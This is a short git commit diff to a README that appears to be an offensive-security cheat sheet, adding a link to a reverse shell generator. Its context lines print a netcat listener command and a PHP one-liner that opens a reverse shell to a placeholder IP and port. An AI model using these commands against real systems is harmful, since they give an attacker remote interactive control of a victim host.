Update README.md

This commit is contained in:
Joe Totes
2022-08-03 19:11:46 -04:00
committed by GitHub
parent c4be10e25a
commit 6ad6d3d094

View File

@@ -416,9 +416,10 @@ sudo nc lnvp {PORT}
# {PORT}: Select the port used to listen
```
<br />
# {IP ADDRESS}: IP Address of the client from step one (python server)
## NC Execute - Server [STEP 2]
```bash
@@ -448,12 +449,16 @@ php -r $sock=fsockopen(“{IP ADDRESS}”,{PORT});exec(“/bin/sh -i <&3 >&3
# {IP ADDRESS}: IP Address of the client from step one (listener)
# {PORT}: Port of the client from step one (listener)
```
<br />
## Reverse Shell Generator
<br />
[https://www.revshells.com/](https://www.revshells.com/)
<br />
# Shell Upgrade